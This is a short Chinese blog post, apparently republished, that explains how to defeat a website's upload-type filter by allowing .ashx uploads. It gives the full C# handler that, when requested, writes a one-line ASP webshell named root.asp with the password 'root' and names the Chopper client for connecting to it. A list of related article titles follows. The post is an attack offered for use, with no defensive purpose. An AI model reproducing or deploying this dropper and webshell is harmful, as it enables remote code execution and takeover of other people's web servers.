另一种办法突破上传类型限制
来源:互联网 发布:图片来源于网络 编辑:程序博客网 时间:2024/05/20 23:31
发现后台可以设置上传类型,但是asp,asa,cer等等都不行,上传之后就提示下载
尝试着关闭了下了,还是不行,后来找到了一位前辈写的文章
过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,
脚本内容如下:
然后访问上传后的ashx文件,就会在同目录下生成一个root.asp的一句话木马,然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了!
密码为root,果断菜刀连之
没有最牛逼的方法,只有最爱思想的脑子
*****************
脚本
ashx.txt
<%@ WebHandler Language="C#" class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
- 另一种办法突破上传类型限制
- post上传文件限制--另一种解决途径
- 突破动力文章上传asp的限制
- 突破IIS6上传文件尺寸限制
- 突破IIS 6上传文件大小限制
- 突破IIS6上传文件尺寸限制
- Asp.net突破4M上传限制
- struts2文件上传突破2M限制
- 突破IIS6上传文件尺寸限制
- struts2文件上传突破2M限制
- 突破IIS6上传文件尺寸限制
- struts2文件上传突破2M限制
- 上传限制类型
- 文件上传类型限制
- ajax上传(xmlhttp上传文件突破大小限制)
- ajax上传(xmlhttp上传文件突破大小限制)
- PHP文件上传及其突破上传文件大小限制
- 突破限制
- 绕过wed防火墙asp脚本
- 全局获取Context的技巧
- [Android]修改bitmap大小
- ubuntu下常用工具
- NumberOfDiscIntersections--重点
- 另一种办法突破上传类型限制
- PowerShell GUI 之 如何快速查询
- 黑客主要攻击方式
- BMP图像文件格式
- C++设计模式[二十一]访问者模式
- 如何用Python写一个贪吃蛇AI
- 修改PullToRefresh下拉刷新动画
- dex分包变形记
- 安卓游戏开发者:我是如何把包体减了88%